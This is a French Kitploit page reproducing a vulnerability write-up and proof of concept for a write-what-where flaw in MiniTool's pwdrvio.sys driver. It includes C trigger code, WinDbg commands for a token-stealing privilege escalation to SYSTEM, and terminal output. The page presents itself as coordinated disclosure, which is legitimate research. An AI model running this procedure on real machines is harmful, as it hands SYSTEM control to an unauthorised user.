Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-36981-Kernel-EoP-PoC — Projet Date : Fév 2026 / Vulnérabilité de corruption mémoire dans le pilote noyau de MiniTool. Démontre une primitive d'écriture arbitraire dans le noyau assistée par débogueur, pouvant être exploitée pour une élévation de privilèges. | Kitploit
Outils/GitHubGitHub/canomer/cve-2026-36981-kernel-eop-poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationDébogueursFuzzingAnalyse de MalwareExploitation de Binaires
GitHubcanomer/cve-2026-36981-kernel-eop-poc

CVE-2026-36981-Kernel-EoP-PoC

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Projet Date : Fév 2026 / Vulnérabilité de corruption mémoire dans le pilote noyau de MiniTool. Démontre une primitive d'écriture arbitraire dans le noyau assistée par débogueur, pouvant être exploitée pour une élévation de privilèges.

Voir le dépôt
2il y a 3 moisPas encore vérifié

CVE-2026-36981-Kernel-EoP-PoC

Condition de type write-what-where dans le noyau au sein du pilote kernel pwdrvio.sys de MiniTool. Démontre une primitive d'écriture arbitraire dans le noyau assistée par débogueur, pouvant être exploitée pour une élévation de privilèges.

  • 2026-02-09 Fournisseur notifié
  • 2026-03-05 Fournisseur a accusé réception
  • 2026-03-05 CVE demandée auprès de MITRE
  • 2026-05-10 Divulgation publique après la période de divulgation coordonnée de 90 jours

https://github.com/user-attachments/assets/ac81d7ce-0be7-40a5-9334-c54350e6e30e

Écriture arbitraire dans le noyau → Élévation de privilèges locale (LPE) Sévérité : ÉLEVÉE
Score CVSS 3.1 : 7.8 (LPE) Chaîne vectorielle CVSS :

  • LPE : CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

    • primitive d'écriture arbitraire dans le noyau assistée par débogueur, pouvant être exploitée pour une élévation de privilèges.
    • Exploitable via une primitive write-what-where à l'offset 0x1641 du pilote
    • Nécessite des outils de débogage du noyau pour une exploitation fiable
    • Confirmé sur Windows 10 Build 19045.6466

Conditions préalables à l'attaque :

  • Accès local au système cible
  • Compte utilisateur standard (non administrateur)
  • MiniTool installé ou désinstallé (pilote pwdrvio.sys chargé)

Résultats de l'exploitation : LPE - Élévation de privilèges assistée par débogueur démontrée (NT AUTHORITY / SYSTEM), compromission totale du système

Chronologie de la découverte de la vulnérabilité

Fuzzing initial et découverte du BSOD

Date : 5 février 2026
Activité : Fuzzing systématique des pilotes du noyau à l'aide d'un fuzzer Python personnalisé

Processus de découverte :

  1. Sélection de la cible :

    • Énumération des pilotes du noyau installés sur la machine virtuelle Windows 10
    • Identification de pwdrvio.sys comme pilote le plus ancien (horodatage : 16 juin 2009)
    • Fichier du pilote : C:\Windows\System32\drivers\pwdrvio.sys
    • Objet de périphérique : \\.\PartitionWizardDiskAccesser\0
  2. Fuzzing initial :

    • Développement d'un fuzzer Python utilisant ctypes pour interfacer avec le pilote
    • Envoi de données aléatoires via WriteFile/DeviceIoControl au périphérique du pilote
    • Résultat : Plusieurs écrans bleus de la mort (BSOD)
  3. Activation du vérificateur :

    • Activation de Driver Verifier pour une détection améliorée des plantages ```cmd verifier /standard /driver pwdrvio.sys
    root@kitploit:~

Configuration du vérificateur : ``` Verifier Flags: 0x001209bb Standard Flags Enabled: [X] Special pool [X] Force IRQL checking
[X] Pool tracking [X] I/O verification [X] Deadlock detection [X] DMA checking [X] Security checks [X] Miscellaneous checks [X] DDI compliance checking

root@kitploit:~
### Configuration du débogage du noyau WinDbg
**Date :** 5-6 février 2026  
**Activité :** Mise en place d'un environnement de débogage du noyau pour l'analyse des causes racines

**Procédure de configuration :**

1. **Configuration du port série VMware :**   ```
VMware Workstation Pro → VM Settings
├─ Add Hardware → Serial Port
├─ Connection: "Use named pipe"
├─ Path: \\.\pipe\com_1
├─ End: "This is the server"
└─ I/O Mode: "Yield CPU on poll" ✓
  1. Configuration du système d'exploitation invité : ```cmd REM Administrator Command Prompt bcdedit /debug on bcdedit /dbgsettings serial debugport:1 baudrate:115200 shutdown /r /t 0

    root@kitploit:~
  2. Connexion hôte WinDbg : ``` WinDbg → File → Attach to Kernel ├─ Port: \.\pipe\com_1 ├─ Baud Rate: 115200 ├─ Pipe: ✓ └─ Reconnect: ✓

    Result: "Kernel Debugger connection established."

    root@kitploit:~

Analyse des causes racines - Découverte d'écriture arbitraire

Date : 6 février 2026
Activité : Primitive d'écriture arbitraire dans le noyau identifiée

Étapes de l'analyse :

  1. Analyse du module : ``` 1: kd> lm m pwdrvio start end module name fffff805315f0000 fffff805315f8000 pwdrvio (Jun 16 2009)

    1: kd> !drvobj pwdrvio 2 Driver object (fffff805`XXXXXXXX) is for: \Driver\pwdrvio

    DriverEntry: fffff805315f6008 DriverUnload: fffff805315f1060

    Dispatch Routines: [00] IRP_MJ_CREATE fffff805315f108c [02] IRP_MJ_CLOSE fffff805315f12f8 [03] IRP_MJ_READ fffff805315f16c4 [04] IRP_MJ_WRITE fffff805315f1564 ← Target [0e] IRP_MJ_DEVICE_CONTROL fffff805`315f1404

    root@kitploit:~
  2. Découverte d'instructions vulnérables :

    Définir un point d'arrêt sur le gestionnaire d'écriture : ``` 1: kd> bp pwdrvio+0x1641 1: kd> g

    Breakpoint 0 hit pwdrvio+0x1641: fffff805`315f1641 498943f0 mov qword ptr [r11-10h],rax

    root@kitploit:~

Constatation critique : Primitive d'écriture arbitraire identifiée !

  • L'instruction écrit le pointeur noyau (RAX) à l'adresse [R11-0x10]
  • R11 est chargé depuis le cadre de pile : mov r11, qword ptr [rbp+0xB8h]
  • Aucune validation n'est effectuée sur l'adresse de destination
  1. Analyse de l'état des registres : ``` 0: kd> r rax=fffff805315f1364 ← Kernel code pointer r11=ffffe60f84c38750 ← Destination address (controlled via stack) rbp=ffffe60f84c38610 ← IRP stack frame

    0: kd> dq @rbp+0xB8 L1 ffffe60f84c386c8 ffffe60f84c38750 ← R11 loaded from here

    root@kitploit:~

Analyse UAF vers Écriture Arbitraire

Date : 6-7 février 2026
Activité : Traçage de la vulnérabilité de User-After-Free vers une condition write-what-where

Chaîne de corruption mémoire :

  1. Allocation IRP : ``` 0: kd> !pool @rbp Pool page ffffe60f84c38610 region is Special pool *ffffe60f84c38000 size: 1f0 data: ffffe60f84c38e10 (NonPaged) *Irp+ Pooltag Irp+ : I/O verifier allocated IRP packets

    root@kitploit:~
  2. Relation de tampon : ``` 0: kd> r rsi rsi=ffffe60f828df900 ← User buffer location

    0: kd> ? @rbp - @rsi Evaluate expression: 35823344 = 00000000`02229ef0 ← 35MB difference!

    root@kitploit:~

Analyse : Le buffer utilisateur n'est PAS directement accessible depuis le cadre RBP

  • RBP pointe vers la structure IRP dans le pool du noyau
  • Le buffer utilisateur se trouve dans une région mémoire différente
  • Le décalage RBP+0xB8 ne pointe pas vers le buffer contrôlé par l'utilisateur
  1. Condition Use-After-Free :

    Le pilote maintient des pointeurs pendants dans la structure IRP : ```c // Ghidra decompilation (pwdrvio+0x1564) longlong lVar1 = *(longlong *)(param_2 + 0xb8); // Load from IRP

    // No validation! lVar5 = IoBuildAsynchronousFsdRequest(...);

    // Write to [lVar1 - 0x10] *(code **)(lVar3 + -0x10) = FUN_00011364; // Arbitrary write!

    root@kitploit:~

Développement d'élévation de privilèges locale

Date : 7-8 février 2026
Activité : Développement de la technique de vol de jeton

Stratégie d'exploitation :

Objectif : Remplacer le jeton du processus actuel par un jeton SYSTEM

Structure EPROCESS de Windows :``` +0x000 Pcb : _KPROCESS ... +0x4b8 Token : _EX_FAST_REF ← Token pointer location

root@kitploit:~
**Procédure de vol de jeton :**

1. **Localiser le processus SYSTEM :**   ```
   0: kd> !process 4 0
   PROCESS ffffe7875ac86200
       SessionId: none  Cid: 0004    Peb: 00000000
       Image: System
   
   0: kd> dq ffffe7875ac86200+4b8 L1
   ffffe787`5ac866b8  ffffc08e`6642f04f  ← SYSTEM token value
  1. Localiser le processus de l'attaquant : ``` 0: kd> !process 0 0 poc1.exe PROCESS ffffe78760150080 SessionId: 1 Cid: 0678 Image: poc1.exe

    0: kd> dq ffffe78760150080+4b8 L1 ffffe78760150538 ffffc08e6c37a066 ← Standard user token

    root@kitploit:~
  2. Calculer l'adresse cible : ``` Target = TokenPointer + 0x10 = 0xffffe78760150538 + 0x10 = 0xffffe78760150548

    Reason: Instruction uses [R11-0x10], so: (Target + 0x10) - 0x10 = Target

    root@kitploit:~
  3. Effectuer l'écrasement du jeton : ``` 0: kd> r rax = ffffc08e6642f04f ; SYSTEM token 0: kd> r r11 = ffffe78760150548 ; Target address 0: kd> p ; Execute: mov [r11-10h],rax

    0: kd> dq ffffe78760150538 L1 ; Verify ffffe78760150538 ffffc08e6642f04f ← Token successfully changed!

    root@kitploit:~
  4. Restaurer l'exécution : ``` 0: kd> r rip = pwdrvio + 165f ; Skip to safe return 0: kd> r eax = 0 ; Return success 0: kd> bc * ; Clear breakpoints 0: kd> g ; Continue execution

    root@kitploit:~

Résultat : Le processus dispose désormais des privilèges SYSTEM !

Vulnérabilité n°1 : Écriture arbitraire dans le noyau menant à une élévation de privilèges (LPE)

Classification CWE

  • CWE-787 : Écriture hors limites
  • CWE-123 : Condition d'écriture où-écrire-quoi
  • CWE-782 : IOCTL exposé avec contrôle d'accès insuffisant

Détails de la vulnérabilité

Emplacement : pwdrvio.sys décalage 0x1641
Assemblage :```assembly pwdrvio+0x1633: mov r11, qword ptr [rbp+0xB8h] ; Load pointer from IRP pwdrvio+0x1641: mov qword ptr [r11-10h], rax ; Arbitrary write!

root@kitploit:~
**Mécanisme de déclenchement :**```c
HANDLE hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0",
                            GENERIC_READ | GENERIC_WRITE,
                            0, NULL, OPEN_EXISTING, 0, NULL);

char buffer[0x100];
DWORD bytesReturned;
WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL);

Limites d'exploitation :

Cette vulnérabilité nécessite des outils de débogage du noyau pour une exploitation fiable, car :

  1. Défi du contrôle des registres :

    • Le registre de destination R11 est chargé depuis [RBP+0xB8]
    • RBP pointe vers la trame de pile IRP dans le pool du noyau
    • Le tampon utilisateur se trouve dans une région mémoire différente (décalage de 35 Mo+)
    • Impossible de contrôler directement [RBP+0xB8] depuis le tampon utilisateur
  2. Disposition de la mémoire du pool : ``` RBP (IRP frame): 0xffffe60f84c38610 User buffer: 0xffffe60f828df900 Difference: 35,823,344 bytes (35 MB)

    root@kitploit:~
  3. Intervention manuelle requise :

    • Définir le registre R11 sur l'adresse cible via le débogueur
    • Définir le registre RAX sur la valeur du jeton SYSTEM
    • Exécuter l'instruction
    • Restaurer le flux d'exécution

Score CVSS 3.1 : 7,8 (ÉLEVÉ)

Métriques :

  • Vecteur d'attaque (AV) : Local - Nécessite un accès local au système
  • Complexité d'attaque (AC) : Faible - Aucune condition particulière requise
  • Privilèges requis (PR) : Faible - Un utilisateur standard suffit
  • Interaction utilisateur (UI) : Aucune - Aucune interaction utilisateur requise
  • Portée (S) : Inchangée - Même autorité de sécurité
  • Confidentialité (C) : Élevée - Accès complet au système de fichiers
  • Intégrité (I) : Élevée - Modification complète du système
  • Disponibilité (A) : Élevée - Peut planter ou désactiver le système

Code complet et exploitation

Code :``` C #include <windows.h> #include <stdio.h>

int main() { HANDLE hDevice; DWORD bytesReturned; char buffer[0x100];

root@kitploit:~
printf("[*] MiniTool PoC Trigger...\n");
printf("[*] Current User: "); system("whoami");

// 1. Connect to the Driver
hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0", 
                      GENERIC_READ | GENERIC_WRITE, 
                      0, NULL, OPEN_EXISTING, 0, NULL);

if (hDevice == INVALID_HANDLE_VALUE) {
    printf("[-] Cannot Open Driver! Error: %d\n", GetLastError());
    return 1;
}

printf("[+] Connected. WinDbg - BP 1641.\n");
printf("[!] WinDbg - Token Change - 'g'.\n");

getchar(); // Breakpoint of WinDbg

// 2. Trigger the Vulnerability (Sending Random Data to Driver)
WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL);

printf("[*] Completed. SYSTEM Shell Opening...\n");

// 3. If we token is changed - SYSTEM Shell
system("whoami && cmd.exe");

return 0;

}

root@kitploit:~
**Comment compiler :**
* MinGW sous Linux```
┌──(PC㉿PC)-[/dir]
└─$ x86_64-w64-mingw32-gcc LPE_PoC.c -o LPE_PoC.exe -lntdll -static

Processus WinDbg :

  • Lorsque notre point d'arrêt s'est déclenché``` 1: kd> bp pwdrvio+0x1641 1: kd> g Breakpoint 0 hit Unable to load image pwdrvio.sys, Win32 error 0n2 pwdrvio+0x1641: fffff805`315f1641 498943f0 mov qword ptr [r11-10h],rax 1: kd> !process 0 0 poc1.exe PROCESS ffff9d8f6401f080 SessionId: 1 Cid: 1948 Peb: 27a2a7000 ParentCid: 16ac DirBase: 1b2528000 ObjectTable: ffffc2093fb93140 HandleCount: 58. Image: poc1.exe

1: kd> dq ffff9d8f6401f080+4b8 L1 ffff9d8f6401f538 ffffc20940117738 1: kd> dq ffff9d8f6401f538 L1 ffff9d8f6401f538 ffffc20940117738 1: kd> !process 4 0 Searching for Process with Cid == 4 PROCESS ffff9d8f5f069040 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 DirBase: 001aa000 ObjectTable: ffffc2093447ac40 HandleCount: 2517. Image: System

1: kd> dq ffff9d8f5f069040+4b8 L1 ffff9d8f5f0694f8 ffffc2093441d8df 1: kd> r rax = ffffc2093441d8df 1: kd> r r11 = ffff9d8f6401f538 + 10 1: kd> p pwdrvio+0x1645: fffff805315f1645 488d442440 lea rax,[rsp+40h] 1: kd> dq ffff9d8f6401f538 L1 ffff9d8f6401f538 ffffc209`3441d8df 1: kd> r rip = pwdrvio + 0x165f 1: kd> r eax = 0 1: kd> bc * 1: kd> g

root@kitploit:~
**Sortie du terminal :**``` PowerShell
PS C:\Users\standarduser\directory> whoami # Standard User Identification
PC\standarduser
PS C:\Users\standarduser\directory> whoami /priv # Standard User Privs

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                        State
============================= ================================== ========
SeShutdownPrivilege           Sistemi kapat                      Disabled
SeChangeNotifyPrivilege       Çapraz geçiş denetimini atla       Enabled
SeUndockPrivilege             Bilgisayarı takma biriminden çıkar Disabled
SeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır       Disabled
SeTimeZonePrivilege           Saat dilimini değiştir             Disabled

PS C:\Users\standarduser\directory> whoami /groups # Standard User Groups

GROUP INFORMATION
-----------------

Group Name                                                Type             SID          Attributes                      
========================================================= ================ ============ ==================================================
Everyone                                                  Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Yerel hesap ve Administrators grubunun üyesi Well-known group S-1-5-114    Group used for deny only        
BUILTIN\Administrators                                    Alias            S-1-5-32-544 Group used for deny only        
BUILTIN\Users                                             Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                  Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
KONSOL OTURUMU AÇMA                                       Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                          Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                            Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Yerel hesap                                  Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                     Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                          Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Zorunlu Etiket\Orta Zorunlu Düzey                         Label            S-1-16-8192                                  
PS C:\Users\standarduser\directory>

PS C:\Users\standarduser\directory> .\poc1.exe # PoC Execution
[*] MiniTool PoC Tetikleyici Baslatiliyor...
[*] Mevcut Kullanici: desktop-usp1rvs\kali
[+] Surucu baglantisi basarili. WinDbg'da BP 1641 bekleyin.
[!] WinDbg'da Token'i degistirdikten sonra 'g' deyin.

[*] Islem tamamlandi. SYSTEM Shell acilmaya calisiliyor...
nt authority\system
Microsoft Windows [Version 10.0.19045.3803]
(c) Microsoft Corporation. Tüm hakları saklıdır.

C:\Users\standarduser\directory>whoami # Elevated User Identification
nt authority\system

C:\Users\standarduser\directory>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                                     State
========================================= =============================================================================== ========
SeCreateTokenPrivilege                    Belirteç nesnesi oluştur                                                        Disabled
SeAssignPrimaryTokenPrivilege             İşlem düzeyi belirtecini değiştir                                               Disabled
SeLockMemoryPrivilege                     Sayfaları bellekte kilitle                                                      Enabled
SeIncreaseQuotaPrivilege                  İşlem için bellek kotaları ayarla                                               Disabled
SeTcbPrivilege                            İşletim sisteminin parçası gibi davran                                          Enabled
SeSecurityPrivilege                       Denetimi ve güvenlik günlüğünü yönet                                            Disabled
SeTakeOwnershipPrivilege                  Dosyaların veya diğer nesnelerin sahipliğini al                                 Disabled
SeLoadDriverPrivilege                     Aygıt sürücüleri yükle ve kaldır                                                Disabled
SeSystemProfilePrivilege                  Sistem performansı profili oluştur                                              Enabled
SeSystemtimePrivilege                     Sistem saatini değiştir                                                         Disabled
SeProfileSingleProcessPrivilege           Tek işlem profili oluştur                                                       Enabled
SeIncreaseBasePriorityPrivilege           Zamanlama önceliğini artır                                                      Enabled
SeCreatePagefilePrivilege                 Disk belleği dosyası oluştur                                                    Enabled
SeCreatePermanentPrivilege                Kalıcı paylaşılan nesneler oluştur                                              Enabled
SeBackupPrivilege                         Dosya ve dizinleri yedekle                                                      Disabled
SeRestorePrivilege                        Dosya ve dizinleri geri yükle                                                   Disabled
SeShutdownPrivilege                       Sistemi kapat                                                                   Disabled
SeDebugPrivilege                          Programların hatalarını ayıkla                                                  Enabled
SeAuditPrivilege                          Güvenlik denetimleri oluştur                                                    Enabled
SeSystemEnvironmentPrivilege              Üretici yazılımı ortam değerlerini değiştir                                     Disabled
SeChangeNotifyPrivilege                   Çapraz geçiş denetimini atla                                                    Enabled
SeUndockPrivilege                         Bilgisayarı takma biriminden çıkar                                              Disabled
SeManageVolumePrivilege                   Birim bakım görevleri gerçekleştir                                              Disabled
SeImpersonatePrivilege                    Kimlik doğrulamasından sonra istemcinin özelliklerini al                        Enabled
SeCreateGlobalPrivilege                   Genel nesneler oluştur                                                          Enabled
SeTrustedCredManAccessPrivilege           Kimlik Bilgileri Yöneticisi'ne güvenilen arayan olarak eriş                     Disabled
SeRelabelPrivilege                        Nesne etiketini değiştir                                                        Disabled
SeIncreaseWorkingSetPrivilege             İşlem çalışma kümesini artır                                                    Enabled
SeTimeZonePrivilege                       Saat dilimini değiştir                                                          Enabled
SeCreateSymbolicLinkPrivilege             Simgesel bağlantılar oluştur                                                    Enabled
SeDelegateSessionUserImpersonatePrivilege Aynı oturumdaki farklı bir kullanıcı için bir kimliğe bürünme belirteci edinin. Enabled

C:\Users\standarduser\directory>whoami /groups

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
BUILTIN\Administrators               Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Zorunlu Etiket\Sistem Zorunlu Düzeyi Label            S-1-16-16384

Preuve de concept et étapes de reproduction

Prérequis

Environnement de test :

  • Système d’exploitation : Windows 10 Famille Build 19045.6466
  • Architecture : x64
  • Version de MiniTool : Partition Wizard 13.5
  • Pilote : pwdrvio.sys (daté du 16 juin 2009)
  • Compte utilisateur : Utilisateur standard (non-administrateur)

Outils requis :

  • Pour l’élévation de privilèges (LPE) : WinDbg (débogueur Windows), VMware Workstation

Reproduction n°2 : Élévation de privilèges locale (assistée par WinDbg)

Étape 1 : Configuration de l’environnement de débogage du noyau

A. Configuration de VMware

  1. Ouvrez les paramètres de la machine virtuelle dans VMware Workstation Pro
  2. Ajoutez un périphérique → Port série
  3. Configurez :
    • Connexion : « Utiliser un tube nommé »
    • Tube nommé : \\.\pipe\com_1
    • Extrémité : « Ceci est le serveur »
    • Autre extrémité : « Une application »
    • Mode E/S : ✓ Céder le processeur en cas d’interrogation
  4. Enregistrez et démarrez la machine virtuelle

B. Configuration du système d’exploitation invité```cmd REM Administrator Command Prompt in VM C:> bcdedit /debug on The operation completed successfully.

C:> bcdedit /dbgsettings serial debugport:1 baudrate:115200 The operation completed successfully.

C:> bcdedit /dbgsettings debugtype Serial debugport 1 baudrate 115200

C:> shutdown /r /t 0

root@kitploit:~
**C. Configuration de WinDbg sur l'hôte**

1. Ouvrez WinDbg (x64)
2. Fichier → Débogage du noyau (Ctrl+K)
3. Configurez :
   - Onglet : COM
   - Port : `\\.\pipe\com_1`
   - Débit en bauds : 115200
   - ✓ Pipe
   - ✓ Reconnexion
4. Cliquez sur OK

Attendez le message de connexion :```
Opened \\.\pipe\com_1
Waiting to reconnect...
Connected to Windows 10 19041 x64 target
Kernel Debugger connection established.

1: kd>

Étape 2 : Compiler la preuve de concept

Enregistrez sous le nom lpe_poc.c :```c #include <windows.h> #include <stdio.h>

int main() { HANDLE hDevice; DWORD bytesReturned; char buffer[0x100];

root@kitploit:~
printf("[*] MiniTool pwdrvio.sys LPE PoC\n");
printf("[*] Current user: ");
system("whoami");

// Open driver
hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0", 
                      GENERIC_READ | GENERIC_WRITE, 
                      0, NULL, OPEN_EXISTING, 0, NULL);

if (hDevice == INVALID_HANDLE_VALUE) {
    printf("[-] Failed to open driver (Error: %d)\n", GetLastError());
    return 1;
}

printf("[+] Driver opened successfully\n");
printf("[!] Waiting for WinDbg manipulation...\n");
printf("[!] Set breakpoint: bp pwdrvio+0x1641\n");
printf("[!] Press ENTER when ready...\n");

getchar();  // Wait for WinDbg setup

// Trigger vulnerability
WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL);

printf("[*] Exploitation complete\n");
printf("[*] Spawning SYSTEM shell...\n");

// If successful, this CMD will have SYSTEM privileges
system("whoami && cmd.exe");

CloseHandle(hDevice);
return 0;

}

root@kitploit:~
**Compiler sous Linux/WSL :**```bash
x86_64-w64-mingw32-gcc lpe_poc.c -o lpe_poc.exe -lntdll -static

Étape 3 : Exécution de l’exploitation

A. Lancer le PoC dans la VM (utilisateur standard)```cmd C:> whoami desktop-lfkkhu2\standard_user

C:> whoami /priv

PRIVILEGES INFORMATION

Privilege Name Description State ============================= ================================== ======== SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking Disabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled

[Limited privileges - no SeDebugPrivilege]

C:> lpe_poc.exe [] MiniTool pwdrvio.sys LPE PoC [] Current user: desktop-lfkkhu2\standard_user [+] Driver opened successfully [!] Waiting for WinDbg manipulation... [!] Set breakpoint: bp pwdrvio+0x1641 [!] Press ENTER when ready...

[WAIT - Do not press ENTER yet]

root@kitploit:~
**B. Configuration et manipulation de WinDbg**```
1: kd> bp pwdrvio+0x1641
1: kd> g

Appuyez maintenant sur ENTRÉE dans le PoC. WinDbg va s'arrêter :``` Breakpoint 0 hit pwdrvio+0x1641: fffff802`18b11641 498943f0 mov qword ptr [r11-10h],rax

0: kd> r rax=fffff80218b11364 rbx=0000000000000000 rcx=ffffe78761218e20 rdx=ffffe7875ff72e10 rsi=ffffe7875dd48f20 rdi=0000000000000000 rip=fffff80218b11641 rsp=ffff9f801c707100 rbp=ffffe7875ff72e10 r8=0000000000000001 r9=0000000000000000 r10=0000000000000000 r11=ffffe7875ff72f70 r12=0000000000000001 r13=ffffdf0a0c48ecd0 r14=0000000000000000 r15=ffffe78761218e20

root@kitploit:~
**C. Localiser le processus SYSTEM et le jeton**```
0: kd> !process 4 0
Searching for Process with Cid == 4
PROCESS ffffe7875ac86200
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 001aa000  ObjectTable: ffffc08e66444c80  HandleCount: 2471
    Image: System

0: kd> dq ffffe7875ac86200+4b8 L1
ffffe787`5ac866b8  ffffc08e`6642f04f  ← SYSTEM token value

D. Localiser le processus de l'attaquant``` 0: kd> !process 0 0 lpe_poc.exe PROCESS ffffe78760150080 SessionId: 1 Cid: 0678 Peb: a520317000 ParentCid: 14b8 DirBase: 402a29000 ObjectTable: ffffc08e6beb0780 HandleCount: 58 Image: lpe_poc.exe

0: kd> dq ffffe78760150080+4b8 L1 ffffe78760150538 ffffc08e6c37a066 ← Current token (standard user)

root@kitploit:~
**E. Effectuer l’écrasement du jeton (Token Overwrite)**```
0: kd> r rax = ffffc08e6642f04f
0: kd> r r11 = ffffe78760150538 + 10

0: kd> r r11
r11=ffffe78760150548

0: kd> p
pwdrvio+0x1645:
fffff802`18b11645 488d442440      lea rax,[rsp+40h]

0: kd> dq ffffe78760150538 L1
ffffe787`60150538  ffffc08e`6642f04f  ← Token successfully changed!

F. Restauration de l'exécution``` 0: kd> r rip = pwdrvio + 165f 0: kd> r eax = 0 0: kd> bc * 0: kd> g

root@kitploit:~
**C. Vérifier l'élévation de privilèges dans la VM**```
[*] Exploitation complete
[*] Spawning SYSTEM shell...
nt authority\system

Microsoft Windows [Version 10.0.19045.6466]

C:\> whoami
nt authority\system

C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                            Description                          State
========================================= ==================================== ========
SeCreateTokenPrivilege                    Create a token object                Disabled
SeAssignPrimaryTokenPrivilege             Replace a process level token        Disabled
SeLockMemoryPrivilege                     Lock pages in memory                 Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process   Disabled
SeTcbPrivilege                            Act as part of the operating system  Enabled
SeSecurityPrivilege                       Manage auditing and security log     Disabled
SeTakeOwnershipPrivilege                  Take ownership of files/objects      Disabled
SeLoadDriverPrivilege                     Load and unload device drivers       Disabled
SeSystemProfilePrivilege                  Profile system performance           Enabled
SeSystemtimePrivilege                     Change the system time               Disabled
SeProfileSingleProcessPrivilege           Profile single process               Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority         Enabled
SeCreatePagefilePrivilege                 Create a pagefile                    Enabled
SeCreatePermanentPrivilege                Create permanent shared objects      Enabled
SeBackupPrivilege                         Back up files and directories        Disabled
SeRestorePrivilege                        Restore files and directories        Disabled
SeShutdownPrivilege                       Shut down the system                 Disabled
SeDebugPrivilege                          Debug programs                       Enabled  ← SYSTEM!
SeAuditPrivilege                          Generate security audits             Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values   Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking             Enabled
SeUndockPrivilege                         Remove computer from docking         Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks     Disabled
SeImpersonatePrivilege                    Impersonate a client after auth      Enabled
SeCreateGlobalPrivilege                   Create global objects                Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as trusted Disabled
SeRelabelPrivilege                        Modify an object label               Disabled
SeIncreaseWorkingSetPrivilege             Increase a process working set       Enabled
SeTimeZonePrivilege                       Change the time zone                 Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                Enabled
SeDelegateSessionUserImpersonatePrivilege Impersonate other session users      Enabled

C:\> whoami /groups

GROUP INFORMATION
-----------------
Group Name                           Type             SID          Attributes
==================================== ================ ============ =======================================
BUILTIN\Administrators               Alias            S-1-5-32-544 Enabled by default, Enabled, Owner
Everyone                             Well-known group S-1-1-0      Mandatory, Enabled by default, Enabled
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory, Enabled by default, Enabled
Mandatory Label\System Mandatory Level Label          S-1-16-16384 ← SYSTEM integrity!

MiniTool Software :``` Product: MiniTool Partition Wizard Version: 13.5 Installation Path: C:\Program Files\MiniTool Partition Wizard Driver Path: C:\Windows\System32\drivers\pwdrvio.sys Driver Date: June 16, 2009 (0x4A36F8D1) Driver Size: 32,256 bytes

root@kitploit:~
**Outils de test :**```
WinDbg Version:        10.0.29507.1001 AMD64
Python Version:        3.x with ctypes
Compiler:              x86_64-w64-mingw32-gcc (MinGW)
Verifier:              Windows Driver Verifier (Standard flags)

Versions concernées

Confirmées comme vulnérables

Produit principal :

  • MiniTool Partition Wizard 13.5
  • Toutes les versions précédentes utilisant pwdrvio.sys

Détails du pilote :``` File Name: pwdrvio.sys File Version: [Not available] File Size: 32,256 bytes (31.5 KB) Time Stamp: 0x4A36F8D1 (June 16, 2009, 04:43:45 UTC) Digital Signature: [Signed by vendor] Device Name: \.\PartitionWizardDiskAccesser\0 Service Name: pwdrvio Load Order: Boot Start (SERVICE_BOOT_START)

root@kitploit:~
### Systèmes potentiellement concernés

Autres produits MiniTool susceptibles d'utiliser le même pilote :
- MiniTool Power Data Recovery
- MiniTool Partition Wizard Bootable Edition
- MiniTool ShadowMaker

**Remarque :** Chaque produit doit être testé individuellement pour confirmation.

### Compatibilité des systèmes d'exploitation

**Testé et confirmé vulnérable :**
- Windows 10 Home Build 19045.6466 (x64)

**Raison :** Le pilote est compatible avec toutes les versions modernes de Windows et ne contient aucun contrôle spécifique à une version.

